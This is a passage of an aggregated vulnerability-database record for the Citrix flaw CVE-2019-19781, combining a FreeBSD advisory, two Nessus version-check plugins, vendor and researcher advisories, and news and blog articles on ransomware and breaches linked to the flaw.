"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2020-01-14T18:24:32", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19781"], "description": "\nArt Manion and Will Dormann report:\n\n\n\t By using an older and less-secure form of open(), it is\n\t possible for untrusted template files to cause reads/writes\n\t outside of the template directories. This vulnerability is\n\t a component of the recent Citrix exploit.\n\t \n\n", "edition": 1, "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "href": "https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html", "title": "Template::Toolkit -- Directory traversal on write", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-30T02:40:49", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-15T00:00:00", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit"], "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/29\");\n\n script_cve_id(\"CVE-2019-19781\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/619785/\"\n );\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e74959bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-29T09:32:32", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-24T00:00:00", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19781"], "modified": "2019-12-24T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/28\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001-S\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\n\ninclude('audit.inc');\n\nversion = get_kb_item_or_exit('Host/NetScaler/Version');\nbuild = get_kb_item('Host/NetScaler/Build');\n\ndisplay_version = version + '-' + build;\nversion = version + '.' + build;\n\nfixed_build = NULL;\n\nif (version =~ '^10\\\\.5' && ver_compare(ver:build, fix:'70.12', strict:FALSE) == -1)\n fixed_build = '10.5-70.12';\n\nif (version =~ '^11\\\\.1' && ver_compare(ver:build, fix:'63.15', strict:FALSE) == -1)\n fixed_build = '11.1-63.15';\n\nif (version =~ '^12\\\\.0' && ver_compare(ver:build, fix:'63.13', strict:FALSE) == -1)\n fixed_build = '12.0-63.13';\n\nif (version =~ '^12\\\\.1' && ver_compare(ver:build, fix:'55.18', strict:FALSE) == -1)\n fixed_build = '12.1-55.18';\n\nif (version =~ '^13\\\\.0' && ver_compare(ver:build, fix:'47.24', strict:FALSE) == -1)\n fixed_build = '13.0-47.24';\n\nif (isnull(fixed_build))\n audit(AUDIT_INST_VER_NOT_VULN, 'Citrix NetScaler', display_version);\n\nreport =\n '\\n Installed version : ' + display_version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2020-10-08T17:44:01", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible. \n\nAs usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.\n\n### What happened?\n\nA few weeks ago, the university hospital Uniklinikum in the German city of D\u00fcsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.\n\nBecause of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal. \n\nAs it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients. \n\nThis is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats likes ransomware.\n\n### What are the main problems facing healthcare security?\n\nIn the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals. \n\nHere are some of those problem elements:\n\n * The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.\n * Legacy systems: Quite often, older equipment will not run properly under newer operating systems which results in several systems that are running on an outdated OS and even on software that has reached the [end-of-life point](<https://blog.malwarebytes.com/awareness/2020/03/windows-7-is-eol-what-next/>). This means that the software will no longer receive patches or updates even when there are known issues.\n * Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.\n * Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can cut time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. These stressors and other reasons are often referred to as &quot;we have more important things to do.&quot;\n\n### IoT security risks\n\nMany medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the [Internet of Things (IoT)](<https://blog.malwarebytes.com/101/2017/12/internet-things-iot-security-never/>). This group of devices comes with its own set of security risks, especially when it comes to [personally ](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[identifiable](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[ information (PII)](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>). \n\nIn every case it is advisable to investigate whether the devices\u2019 settings allow to approach it over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.\n\n### Legacy systems\n\nMedical systems come from various suppliers and in any hospital you will find many different types. Each with their own goal, user guide, and updating regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. And we can relate to that state of mind except when applied to security updates on a connected system.\n\n### Disaster stress\n\nOkay, here comes our umpteenth mention of COVID-19\u2014I know, but it is a factor that we can\u2019t ignore. \n\nThe recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up. \n\nIn some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and earth slides.\n\n### More important matters at hand?\n\nIt&#x27;s difficult to overstate the importance of &quot;triage&quot; in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis. \n\nIt should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait. \n\nInterestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman&#x27;s death. \n\nWhile we can hardly blame the CISO for the woman\u2019s death, there may come a time when inadequate security and its results may carry punishment for those responsible.\n\n### Ransomware in particular\n\nThe ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) vulnerability in Citrix VPNs. \n\nIn more recent news, we learned that [UHS hospitals](<https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/>) in the US were hit by [Ryuk ransomware](<https://blog.malwarebytes.com/detections/ransom-ryuk/>). \n\nIt&#x27;s also important to remember that the costs of a [ransomware attack ](<https://www.malwarebytes.com/ransomware/>)are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that. \n\nIt takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won\u2019t happen again. Also, a thorough investigation may be necessary to check whether the attacker did not leave any [backdoors ](<https://www.malwarebytes.com/backdoor/>)behind.\n\n### There\u2019s a problem for every solution\n\nSecurity will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it\u2019s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do\u2014and in what order\u2014can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damages and help with a speedy recovery.\n\nTo sum it up, you are going to need:\n\n * Recovery plans for different scenarios: [data breaches](<https://www.malwarebytes.com/data-breach/>), ransomware attacks, you name it\n * File backups that are recent and easy to deploy or another type of rollback method\n * Backup systems that can take over when critical systems are crippled\n * Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans\n\nAnd last but not least, don\u2019t forget to focus on prevention. The best thing about a recovery plan is when you never need it.\n\nStay safe, everyone!\n\nThe post [Healthcare security update: death by ransomware, what&#x27;s next?](<https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2020-10-08T15:30:00", "published": "2020-10-08T15:30:00", "id": "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "href": "https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/", "type": "malwarebytes", "title": "Healthcare security update: death by ransomware, what\u2019s next?", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T16:30:59", "bulletinFamily": "blog", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories&#x27; executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won&#x27;t be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-04-16T14:59:38", "published": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "ptsecurity": [{"lastseen": "2020-06-11T19:06:19", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "# PT-2020-01: Arbitrary code execution in Citrix ADC\n\nCitrix Application Delivery Controller (ADC) and Gateway\n\n**Severity:**\n\nSeverity level: High \nImpact: Arbitrary code execution in Citrix ADC \nAccess Vector: Remote\n\nCVSS v3 Base Score: 9.8 HIGH \nVector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\nCVE: CVE-2019-19781\n\n**Vulnerability description:**\n\nThis vulnerability allows an unauthorized, remote attacker to execute malicious code on the system, obtain unauthorized access to published applications, and attack intranet resources of the target organization via Citrix servers.\n\n**Advisory status:**\n\n05.12.2019 - Vendor gets vulnerability details 19.01.2020, 22.01.2020 23.01.2020, 24.01.2020 - Vendor releases fixed version and details\n\n**Credits:**\n\nThe vulnerability was discovered by Mikhail Klyuchnikov, Positive Technologies\n", "edition": 1, "modified": "1970-01-01T00:00:00", "published": "2020-01-24T00:00:00", "id": "PT-2020-01", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2020-01/", "title": "PT-2020-01: Arbitrary code execution in Citrix ADC", "type": "ptsecurity", "cvss": {}}], "krebs": [{"lastseen": "2020-02-19T23:32:25", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "Networking software giant **Citrix Systems** says malicious hackers were inside its networks for five months between 2018 and 2019, making off with personal and financial data on company employees, contractors, interns, job candidates and their dependents. The disclosure comes almost a year after Citrix acknowledged that digital intruders had broken in by probing its employee accounts for weak passwords.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2020/02/citrix-notice.png>)\n\nCitrix provides software used by hundreds of thousands of clients worldwide, including most of the Fortune 100 companies. It is perhaps best known for selling virtual private networking (VPN) software that lets users remotely access networks and computers over an encrypted connection.\n\nIn March 2019, the **Federal Bureau of Investigation** (FBI) alerted Citrix they had reason to believe cybercriminals had gained access to the company's internal network. The FBI told Citrix the hackers likely got in using a technique called \"[password spraying](<https://resources.infosecinstitute.com/password-spraying/>),\" a relatively crude but remarkably effective attack that attempts to access a large number of employee accounts (usernames/email addresses) using just a handful of common passwords.\n\nIn [a statement](<https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/>) released at the time, Citrix said it appeared hackers \"may have accessed and downloaded business documents,\" and that it was still working to identify what precisely was accessed or stolen.\n\nBut in a letter sent to affected individuals dated Feb. 10, 2020, Citrix disclosed additional details about the incident. According to the letter, the attackers \"had intermittent access\" to Citrix's internal network between Oct. 13, 2018 and Mar. 8, 2019, and that there was no evidence that the cybercrooks still remain in the company's systems.\n\nCitrix said the information taken by the intruders may have included Social Security Numbers or other tax identification numbers, driver's license numbers, passport numbers, financial account numbers, payment card numbers, and/or limited health claims information, such as health insurance participant identification number and/or claims information relating to date of service and provider name.\n\nIt is unclear how many people received this letter, but the communication suggests Citrix is contacting a broad range of individuals who work or worked for the company at some point, as well as those who applied for jobs or internships there and people who may have received health or other benefits from the company by virtue of having a family member employed by the company.\n\nCitrix's letter was prompted by laws in virtually all U.S. states that require companies to notify affected consumers of any incident that jeopardizes their personal and financial data. While the notification does not specify whether the attackers stole proprietary data about the company's software and internal operations, the intruders certainly had ample opportunity to access at least some of that information as well.\n\nShortly after Citrix initially disclosed the intrusion in March 2019, a little-known security company **Resecurity** [claimed](<https://web.archive.org/web/20190313082751/https://resecurity.com/blog/supply-chain-the-major-target-of-cyberespionage-groups/>) it had evidence Iranian hackers were responsible, had been in Citrix\u2019s network for years, and had offloaded terabytes of data. Resecurity also presented evidence that it notified Citrix of the breach as early as Dec. 28, 2018, a claim Citrix initially denied but later acknowledged.\n\nIranian hackers recently have been blamed for hacking VPN servers around the world in a bid to plant backdoors in large corporate networks. A [report released this week](<https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf>) (PDF) by security firm **ClearSky** details how Iran's government-backed hacking units have been busy exploiting security holes in popular VPN products from Citrix and a number of other software firms.\n\nClearSky says the attackers have focused on attacking VPN tools because they provide a long-lasting foothold at the targeted organizations, and frequently open the door to breaching additional companies through supply-chain attacks. The company says such tactics have allowed the Iranian hackers to gain persistent access to the networks of companies across a broad range of sectors, including IT, security, telecommunications, oil and gas, aviation, and government.\n\nAmong the VPN flaws available to attackers is a recently-patched vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in Citrix VPN servers dubbed \"Shitrix\" by some in the security community. The derisive nickname may have been chosen because while Citrix [initially warned customers about the vulnerability in mid-December 2019](<https://support.citrix.com/article/CTX267027>), it didn't start releasing patches to plug the holes until late January 2020 -- roughly two weeks after attackers started using [publicly released exploit code](<https://www.zdnet.com/article/proof-of-concept-code-published-for-citrix-bug-as-attacks-intensify/>) to break into vulnerable organizations.\n\nHow would your organization hold up to a password spraying attack? As the Citrix hack shows, if you don\u2019t know you should probably check, and then act on the results accordingly. It's a fair bet the bad guys are going to find out even if you 